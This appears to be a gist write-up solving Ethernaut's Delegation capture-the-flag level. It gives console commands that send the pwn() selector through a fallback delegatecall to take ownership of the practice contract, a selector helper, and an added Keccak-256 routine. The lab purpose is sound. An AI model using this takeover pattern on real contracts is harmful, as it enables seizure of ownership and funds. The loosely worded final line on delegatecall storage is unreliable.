Created
June 25, 2022 19:08
Level 6 - Delegation - Ethernaut
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract DelegationHack {
    // Returns the ABI-encoded call data for pwn(): its 4-byte function selector.
    function delegationHack() public pure returns (bytes memory) {
        bytes memory functionID = abi.encodeWithSignature("pwn()");
        return functionID;
    }
}
https://solidity-by-example.org/fallback/
Fallback is a function that does not take any arguments and does not return anything.
It is executed either when:
- a function that does not exist is called, or
- Ether is sent directly to a contract but receive() does not exist or msg.data is not empty
Fallback has a 2300 gas limit when called by transfer or send.
Option 1:
- Deploy a contract to get the 4-byte signature of the function pwn()
- await contract.sendTransaction({data: "0xdd365b8b"}); // function ID, selector or signature
Option 2:
- Call the pwn() function
const data = web3.utils.sha3("pwn()"); // this retrieves the complete hash instead of the first 4 bytes; its first 4 bytes are the selector
- Pass this information to the data property, which will assign msg.data
await contract.sendTransaction({ data });
Finally, check who is now the owner of the contract:
await contract.owner();
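The selector from Option 1 can also be derived offline instead of deploying a helper contract. The following is an added example, not part of the original gist: a dependency-free Keccak-256 in JavaScript that computes the 4-byte function ID. The names keccakF1600, keccak256 and selector are chosen here for illustration.

```javascript
// Added example: Keccak-256 as used by Ethereum (pad byte 0x01, not SHA-3's 0x06).
const M64 = (1n << 64n) - 1n;
const rol = (v, n) => ((v << n) | (v >> (64n - n))) & M64;

function keccakF1600(a) { // a: 25 BigInt lanes, lane (x, y) stored at index x + 5*y
  let R = 1; // LFSR state that generates the round constants
  for (let round = 0; round < 24; round++) {
    // theta: mix each lane with the parity of two neighbouring columns
    const C = [0, 1, 2, 3, 4].map(x => a[x] ^ a[x + 5] ^ a[x + 10] ^ a[x + 15] ^ a[x + 20]);
    for (let i = 0; i < 25; i++) a[i] ^= C[(i + 4) % 5] ^ rol(C[(i + 1) % 5], 1n);
    // rho + pi: rotate each lane and move it to its new position
    let x = 1, y = 0, cur = a[1];
    for (let t = 0; t < 24; t++) {
      [x, y] = [y, (2 * x + 3 * y) % 5];
      const rot = BigInt(((t + 1) * (t + 2) / 2) % 64);
      [cur, a[x + 5 * y]] = [a[x + 5 * y], rol(cur, rot)];
    }
    // chi: non-linear step, applied row by row
    for (let row = 0; row < 25; row += 5) {
      const T = a.slice(row, row + 5);
      for (let i = 0; i < 5; i++) a[row + i] = T[i] ^ (~T[(i + 1) % 5] & T[(i + 2) % 5]);
    }
    // iota: XOR the round constant into lane (0, 0)
    for (let j = 0; j < 7; j++) {
      R = ((R << 1) ^ ((R >> 7) * 0x71)) % 256;
      if (R & 2) a[0] ^= 1n << ((1n << BigInt(j)) - 1n);
    }
  }
}

function keccak256(bytes) { // bytes: Uint8Array, returns lowercase hex
  const RATE = 136, st = new Uint8Array(200), dv = new DataView(st.buffer);
  const permute = () => {
    const a = Array.from({ length: 25 }, (_, i) => dv.getBigUint64(8 * i, true));
    keccakF1600(a);
    a.forEach((v, i) => dv.setBigUint64(8 * i, v, true));
  };
  let n = 0;
  for (const b of bytes) {
    st[n++] ^= b;
    if (n === RATE) { permute(); n = 0; }
  }
  st[n] ^= 0x01; st[RATE - 1] ^= 0x80; // pad10*1 padding
  permute();
  return Array.from(st.subarray(0, 32), b => b.toString(16).padStart(2, "0")).join("");
}
// 4-byte function selector = first 4 bytes of keccak256(signature)
const selector = sig => "0x" + keccak256(new TextEncoder().encode(sig)).slice(0, 8);
console.log(selector("pwn()"));
```

The full digest returned by keccak256 corresponds to what Option 2 sends as data; only its leading 4 bytes take part in function dispatch.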
A delegate call doesn’t change the target contract’s storage.